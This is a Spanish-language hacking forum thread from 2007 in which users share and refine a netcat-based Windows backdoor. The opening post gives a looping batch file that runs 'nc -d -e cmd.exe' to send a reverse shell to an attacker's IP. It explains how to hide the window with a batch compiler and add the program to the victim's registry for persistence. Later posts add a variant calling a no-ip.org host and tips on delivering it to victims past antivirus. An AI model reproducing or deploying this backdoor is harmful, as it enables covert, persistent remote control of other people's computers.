Backdoor reverse shell con netcat

skilled · 1 Enero 2007, 23:04 PM

Bueno posteo mi forma de dejar un backdoor reverse shell:

Creo el siguiente bat:

@echo off
:svr
nc -d -e cmd.exe x.x.x.x 3333>nul
ping -n 60 localhost>nul
goto svr

Si ejecuto el siguiente bat intentara la conexion a x.x.x.x aproximadamente cada minuto creando un bucle infinito.
(Podemos quitar la linea del ping para que intente la conexion infinitamente).

El problema de la ejecución de este backdoor es el cuadro de dialogo de secuencia de comandos. Para poder ocultarlo compilamos el bat con quick batch file compiler triando la opcion ghost application para que oculte el cuadro.
Finalmente añadimos el exe en el registro de la victima y con tansolo poner en nuestra shell: nc -vv -l -p 3333 obtendremos su shell, y si cerramos la conexion la podremos volver a obtener del mismo metodo.

Nose si alguien ya utilizo este metodo.. yo solo he visto utilizar backdoors revere shell con comandos at. Bueno espero que sirva igual.

octalh · 1 Enero 2007, 23:10 PM

muy util gracias por la info

salu2

RevangelyonX · 2 Enero 2007, 01:13 AM

Creo que es importante decir, que el bat debe estar en la misma ruta del NC de la victima para que funcione, si no saltará un error, ya que no podrá ejecutar Nc al no encontrar Netcat.

Para que sea compresible, si creamos un bat simple

::No pongamos el @echo off
echo hola
pause
exit

veremos que, al abrirlo, estaremos en la ruta %userprofile%\escritorio>

Con lo cual, o ponemos en bat en la misma carpeta que el nc, o en el bat podemos hacer un:

cd \
cd nc
::por ejemplo

Pero si no, la idea está muy bien!

Un saludo!

skilled · 2 Enero 2007, 01:23 AM

Primero gracias por postear

Citarbat debe estar en la misma ruta del NC de la victima para que funcione, si no saltará un error

Esto es un backdoor, supuestamente hemos obtenido el control del sistema (o no...) y queremos dejar una puerta trasera. Nc lo mejor es meterlo en system32 si no:

Código [Seleccionar]

@echo off
:svr
c:\ruta\nc -d -e cmd.exe x.x.x.x 3333>nul
ping -n 60 localhost>nul
goto svr

Saludos

octalh · 2 Enero 2007, 03:59 AM

lo e probado y funciona bastante bien, la manera de hacer el "timer" para el bucle me parece muy ingeniosa XD mira que usar un ping es algo muy original.

salu2 y gracias por compartirlo

rakax · 2 Enero 2007, 04:21 AM

Y esto serviria si e vez de mi IP pongo la cuenta de NO-IP? es k tengo IP dinamica.
Gracias

Zinc · 2 Enero 2007, 08:26 AM

Seria lo mismo..

Saludos!!

rakax · 2 Enero 2007, 09:02 AM

Quien me explica lo k me pasa,aveces cuando corro un programa en CMD me sale acceso denegado,tengo permisos de administrador,no tengo antivirus ni firewall mal configurado.Hace tiempo k me pasa pero ya no lo aguanto grrr.
Gracias
P.D:Adjunto el codigo para k vean k esta bien,el nc esta en system32

Código [Seleccionar]

:svr
nc.exe -d -e cmd.exe raka.no-ip.org 5000>nul
ping -n 60 localhost>nul
goto svr

Gracias

skilled · 2 Enero 2007, 12:32 PM

Prueva de ponerlo en otra carpeta que no sea system32, si te funciona seguramente seran los permisos. Mira las cuentas que tienes y asegurate que eres admin.

Si no te funciona asegurate de no tener ningun tipo de programa antivirus. Haz un net start y mira que no tengas ningun antivirus o programa parecido, y mira los procesos.

Citarno tengo antivirus

Si no es nada de esto pillate un antivirus y haz un repasso a tu disco.

Saludos

Codename!! · 2 Enero 2007, 21:01 PM

hoy dia el nc es detectado enviale un sfx y veras como el panda le salta a la supuesta victima xdd